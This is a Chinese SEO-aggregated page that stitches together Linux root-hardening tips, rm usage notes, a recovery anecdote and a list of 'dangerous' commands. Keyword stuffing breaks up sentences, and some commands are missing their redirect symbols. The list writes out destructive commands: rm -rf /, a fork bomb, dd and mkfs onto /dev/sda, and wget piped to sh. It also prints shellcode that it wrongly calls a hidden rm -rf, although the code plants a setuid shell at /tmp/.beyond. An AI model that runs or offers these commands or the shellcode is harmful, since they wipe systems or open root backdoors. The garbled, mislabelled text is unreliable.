锐客网

  1. 首页 > 睿知 > it技术 > >

linux哪个命令慎用 linux最常用命令20个

命令IT技术

SSH连接linux服务器 能不能删除 root文件?Root权限系统安全Linux
Linux系统中Root拥有最高权限,因此攻击者往往以获取Root权限为目标 。作为管理员如何有效地对Root进行有效管理呢?本文将从权限控制linux哪个命令慎用的角度,提供几个安全技巧 。
Linux是当前比较流行的网络服务器操作系统,它继承linux哪个命令慎用了UNIX系统安全、稳定、高效等优点 。在Linux系统中Root拥有最高权限 , 正因如此攻击者往往以获取Root权限为目标 。作为管理员如何有效地对Root进行有效管理呢?本文将从权限控制的角度,提供几个安全技巧 。演示环境Red Hat Enterprise Linux 51、远程登录我们知道在RHEL系统中,默认是允许Root用户直接远程登录的 。假若攻击者获取了Root的密码,然后进行远程登录,那整个服务器就沦陷了 。因此 , 我们要做好Root的权限限制,拒绝其远程登录 。这样,就算攻击者获取了Root密码 , 也不能通过远程登录控制服务器 。限制Root远程登录的方法有很多种 , 笔者向大家推荐两种 。(1)SSH限制我们知道SSH是Linux系统中用于远程维护管理的一个服务,类似于Windows系统中的Telnet或者远程桌面3389 。通过SSH限制Root远程登录 , 我们需要做的就是修改SSH的配置文件 。找/etc/ssh/sshd_config文件,在其中添加PermitRootLogin no 。需要注意的是Linux系统是大小写敏感的,不要输错 。输入完毕后 , 保存并退出,然后输入命令service sshd restart重启SSH服务使修改生效 。这样当通过Root远程连接Linux服务器时,就会拒绝连接
PAM认证我们还可以使用PAM认证模块来拒绝Root用户直接登录系统,可通过下面的操作来实现 。打开/etc/pam.d/sshd文件,在第一行加入auth required /lib/security/pam_listfile.so item=user sense=deny file=/etc/sshduser onerr=succeed这条语句 。其含义是,在登录时认证帐户和密码是否有效,只有认证通过才能登录系统,否则结束认证拒绝登录 。它的认证模块是/lib/security/pam_listfile.so , 认证的用户是用户(user),当然也可以是组(group),认证的方式是拒绝(deny),认证文件是/etc/sshduser,文件名及目录随意,如果认证成功就返回(succeed
 然后我们创建一个认证文件,可以在终端中运行命令echo "root" /etc/sshduser来创建,当然我们也可以使用vi打开sshduser文件来加入用户 。需要说明的是 , 当有多个用户时,每个用户占用一行 。添加完成后 , 再使用Root直接登录服务器就可以看到登录被拒绝了
 2、su限制我们知道在Linux系统中有个su命令,利用该命令只要知道Root用户的密码 , 默认情况下任何人都可以切换到Root用户中进行操作 。例如,一个属于users组的普通用户gslw可以通过su命令切换到Root用户中
 因此,我们需要对SU进行限制,只允许特定组的用户才能SU到Root用户 。使用的方法还是通过PAM认证模块来实现 。我们先前控制ssh服务 , 是使用/etc/pam.d/sshd文件,当然控制用户使用su命令就需要对/etc/pam.d/su文件进行修改 。直接打开该文件进行修改 , 或者在终端命令窗口输入命令vi /etc/pam.d/su , 然后去掉其中#auth required pam_wheel.so use_uid的注释即可
 其含义是 , 使用pam_wheel.so文件来检查当前用户的UID,如果不是whell组的用户就直接拒绝 。现在我们通过gslw用户登录系统,然后su到Root可以看到被拒绝 。当然 , 要使其可以su到Root需要将其加入了wheel组才可以
 3、Root分权大家知道,由于Root具有最高的权限,经常用root用户来管理系统,会给系统带来一定的安全隐患 。比如,一条无意识输入的破坏性的命令有可能会给系统带来毁灭性的打击 。另外,如果系统被植入了嗅探工具 , 如果用root登录会造成root口令被窃取 。因此我们要消减Root的权限,可以让其它用户来完成Root的一些工作,避免过多地使用Root用户 。如何为Root分权 , 要根据服务器的性质来确定 。比如一个Linux平台的apache服务器,作为管理员经常使用的命令应该是诸如/usr/local/apache2/bin/apachect1 start/stop/restart这样的是启动/重启/停止服务器的命令 。我们可以为此创建一个用户gslw来管理apache服务器,我们知道普通用户是没有权限来启动apache服务器的 。这里要用到sudo命令,通过它为gslw用户加入扩展权限使其可以管理apache服务器 。利用Vi或者直接进入/etc/pam.d打开sudo文件,然后在其中添加一行gslw ALL=(ALL) /usr/local/apache2/bin/apachectl命令就可以了 。该命令分成四个字段,依次为用户名、作用对象、以谁的身份运行以及运行的命令 。当然,我们也可以加入gslw localhost=(root) /usr/local/apache2/bin/apachectl start,这样过滤更严格一些 。最后保存退出后,使用gslw用户登录系统就可以运行/usr/local/apache2/bin/apachectl start命令了 。上面只是举例 , 大家可以根据自己的需要在sudo文件中添加相应的命令行 。不过,需要说明的是命令一定要严格过滤,不要赋权过大
总结:Linux下的权限控制是非常严格的 , 但也非常灵活,我们可以根据自己的安全需求进行布防 。当然 , 关于Root权限的控制策略和方法还有很多,希望本文提供的思路对大家有所帮助 。
linux怎么删除一个目录和其中的子文件(子目录) 。概述
用命令的么linux哪个命令慎用,rm -r [filesname]
解析
linux 中 rm 是用作删除的命令linux哪个命令慎用,且是不可逆的命令linux哪个命令慎用,也就是删除后无法恢复 。
rm命令可以删除一个目录中的一个或多个文件或目录 , 也可以将某个目录及其下属的所有文件及其子目录均删除掉 。对于链接文件,只是删除整个链接文件 , 而原有文件保持不变 。
rm语法
rm (选项)(参数)
选项
-d:直接把欲删除的目录的硬连接数据删除成0,删除该目录;
-f:强制删除文件或目录;
-i:删除已有文件或目录之前先询问用户;
-r或-R:递归处理,将指定目录下的所有文件与子目录一并处理;
--preserve-root:不对根目录进行递归操作;
-v:显示指令的详细执行过程 。
由此可知,删除一个目录时,当该需要删除的目录内还有目录时,linux哪个命令慎用我们可以带上选项 -r , 进行递归删除 。
【linux哪个命令慎用 linux最常用命令20个】拓展内容
linux
Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任务、支持多线程和多CPU的操作系统 。它能运行主要的UNIX工具软件、应用程序和网络协议 。它支持32位和64位硬件 。Linux继承linux哪个命令慎用了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统 。
Linux操作系统诞生于1991 年10 月5 日(这是第一次正式向外公布时间) 。Linux存在着许多不同的Linux版本,但它们都使用了Linux内核 。Linux可安装在各种计算机硬件设备中,比如手机、平板电脑、路由器、视频游戏控制台、台式计算机、大型机和超级计算机 。
严格来讲 , Linux这个词本身只表示Linux内核,但实际上人们已经习惯了用Linux来形容整个基于Linux内核,并且使用GNU工程各种工具和数据库的操作系统 。
linux redhat执行了rm -rf /*如何恢复数据?国外著名linx管理员守则中有这么一条:“慎用rm -rf命令,除非你知道此命令将带来什么后果 。” 可见这个命令的重要性?。?书中看到的这句话,确实很对 。
说了这么多,教教大家执行了rm命令后 该这么办吧,是有办法回复的,我刚经过试验证实了,google有一个开源的包 叫ext3grep工具他可以回复删除的文件,甚至是drop database xcy; 对,就是误删除的数据库都可以回复 。
先说一下他的工作原理吧 , 然后我在把试验分享给大家,工作原理其实也不难,这个工具需要在ext3或者ext4 的文件系统上才可以实现,因为ext3文件系统是日志型文件系统,ext3文件系统储存信息的时候是由inode号和block块存储的 。
神马? 不知道什么是inode号?和block块? 好吧,在说明白点,比如:一个分区比如一本书,那么block块就是书每页的内容,而inode号 就是书的目录,系统找文件的时候先找inode号 然后根据inode号去找硬盘上的block快信息 , 明白了吧!
在说一下删除的原理吧 。当硬盘上的一个文件删除,其实没有真正想象中的那样在硬盘上清除掉的 , 他是把inode号和block块的那个链子 断开,但是真正的数据还是在硬盘上的,有没有感觉在windos上删除是那么快,没考虑到这吧,当你在删除文件的地方重新复制了新文件,那时候才会把之前的文件覆盖掉,也就是说删除了没有关系,千万不要往那个位置放文件了 。
Linux中最危险的10个命令 Linux中最危险的10个命令
对于编程人员或或者Linux系统管理员来说linux哪个命令慎用,操作Linux系统最常见的方法就是使用命令行 。当然linux哪个命令慎用,Linux命令行佷有用、很高效linux哪个命令慎用,但有时候也很危险 , 尤其是在你误操作或者不确定你自己在正在做什么的时候 。下面linux哪个命令慎用我就为大家盘点最危险是10个命令,一起来看看吧!
当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普 通用户身份下,破坏的只是自己的一亩三分地 。
1. rm -rf 命令
rm -rf命令是删除文件夹及其内容最快的方式之一 。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏 。下列是一些rm 命令的选项 。
rm 命令在Linux下通常用来删除文件 。
rm -r 命令递归的删除文件夹,甚至是空的文件夹 。(译注linux哪个命令慎用:个人认为此处应该是说错了,从常识看 , 应该是“甚至是非空的文件夹”)
rm -f 命令能不经过询问直接删除‘只读文件’ 。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限 。所以,-f这个参数 只是表示不必一个个删除确认,而是一律悄悄删除 。另外 , 原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认 , 而-f则抑制了这个提示 。)
rm -rf / : 强制删除根目录下所有东东 。(就是说删除完毕后,什么也没有了 。。。)
rm -rf *: 强制删除当前目录的所有文件 。
rm -rf . : 强制删除当前文件夹及其子文件夹 。
从 现在起,当你要执行rm -rf命令时请留心一点 。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名 , 来预防用 ‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求 。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊 。)
2. :(){:|:};: 命令
这就是个fork 炸弹的实例 。具体操作是通过定义一个名为 ‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台 。它会反复的执行下去直到系统崩溃 。
:(){:|:};:
哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
3. 命令/dev/sda
上列命令会将某个‘命令‘的输出写到块设备/dev/sda中 。该操作会将在块设备中的所有数据块替换为命令写入的原始数据 , 从而导致整个块设备的数据丢失 。
4. mv 文件夹 /dev/null
这 个命令会移动某个‘文件夹‘到/dev/null 。在Linux中 /dev/null 或 null 设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功 。(译注:这就是黑洞啊 。当然 , 要说明的是,通过将文件夹移动到黑洞,并不能阻止 数据恢复软件的救赎,所以 , 真正的`彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的 。)
# mv /home/user/* /dev/null
上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞 (null)之中 。
5. wget-O- | sh
上列命令会从一个(也许是)恶意源下载一个脚本并执行 。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本 。
注意: 你应该时刻注意你下载包或脚本的源 。只能使用那些从可信任的源中下载脚本/程序 。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是 , 我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行 。)
6. mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化 , 崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段 。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设 备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用 。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁 灭性的,上面的数据都会被蒸发了 。)
7.file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出 。不过请在执行前 , 确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了 。另外,我想你可能真正想用的是 “”,即累加新的输出到文件,而不是刷新那个文件 。) 。如果用上列执行时输入错误或无知的输入类似 “xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件 。
8. ^foo^bar
这个命令在“鲜为人知而又实用的 Linux 命令大全:”中描述过,用来编辑先前运行的命令而无需重打整个命令 。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦 。(译注:事实上 , 这种小技巧是译者认为的 , 少数史前时代遗留下来的无用而有害的“黑客”技巧 。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据 。当然!你的系统可能陷入混乱和不可恢复的状态 。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次 。)
10. 隐藏命令
下面的命令其实就是上面第一个命令 (rm -rf) 。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄 。在终端里运行下面命令可能会擦除你的根分区 。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到 。你必须时刻留心你在做什么结果会怎样 。不要编译/运行从未知来源的代码 。
char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;
注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令,因为这将导致数据丢失或者系统崩溃 。如果你想测试它们,请在虚拟机上运行 。
;
linux下的文件管理操作1、复制文件和目录
在Linux中使用命令cp来复制文件或者目录,使用方式:
cp 源文件(文件夹)目标文件(文件夹)
cp命令常用参数:
-r 递归复制整个目录
-v 显示详细信息
2、移动、重命名一个文件或目录
使用mv命令来移动或者重命名一个文件夹以及目录,使用方式:
mv 源文件(文件夹) 目标目录
移动时如果指定文件名,则会进行重命名
3、删除文件或目录
使用命令rm用以删除一个文件或文件夹,使用方式:
rm 文件/文件夹
rm命令常用参数:
-i 交互式删除
-r 递归删除文件夹下所有文件
-f 强制删除,不提示(慎用)
4、创建和删除空目录
使用命令mkdir可以创建一个空目录
mkdir 目录名称
使用命令rmdir可以删除一个空目录
rmdir 目录名称
如果是需要删除包含文件linux哪个命令慎用的目录linux哪个命令慎用的话还是要使用rm -r命令
注意:以上内容只是简单的介绍linux哪个命令慎用了文件的基本操作,更多内容需要自己慢慢学习 。
linux下怎么删除目录以及子目录下的一些文件使用rm -r /var/www/html/test 这样删除/var/www/html/test这个目录及其子目录;
rmremove删除的意思
参数-rrecursive递归的意思
递归删除代表删除指定目录及目录下的文件夹;
如果要忽视错误可以使用 rm -rf /var/www/html/test
但是这样的命令慎用,防止误删除尤其在根目录root权限运行这样的命令 。
关于linux哪个命令慎用和linux最常用命令20个的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息 , 记得收藏关注本站 。

    推荐阅读


    上一篇:如何更改IP服务器? 怎么更换ip服务器

    下一篇:如何使用beef扫描服务器? beef怎么扫描服务器